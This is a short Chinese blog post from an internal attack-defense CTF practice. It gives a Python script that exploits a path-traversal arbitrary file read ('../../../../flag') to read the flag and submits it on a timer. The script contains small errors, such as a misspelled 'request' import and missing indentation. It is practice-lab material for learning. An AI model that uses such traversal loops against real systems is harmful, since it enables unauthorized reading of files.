背景
近期部門內搭建了攻防實驗平台供大家練習,周末組織了一波AWD練習,之前都是做滲透測試比較多,加之題目比較簡單,找到漏洞getshell拿flag都沒問題,只不過如果沒找到突破口flag都要手動提交的話,拿分會慢很多。
在過程中發現其實除了getshell后在服務器根目錄/下讀到flag,其實靶機網站中還存在一個任意文件讀取漏洞,那這樣寫腳本自動flag就簡單得多了。
自動提交flag的腳本
#! /usr/bin/env python
# coding: utf-8
import os
import time
import request
url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"
while True:
flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
print flag
url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
submit = request.get(url2).text
print submit
time.sleep(60*2) #flag兩分鍾更新一次
后記
只是想記錄一下,flag不一定需要getshell后才能拿到,所以寫自動提交flag的腳本也可以是多樣的
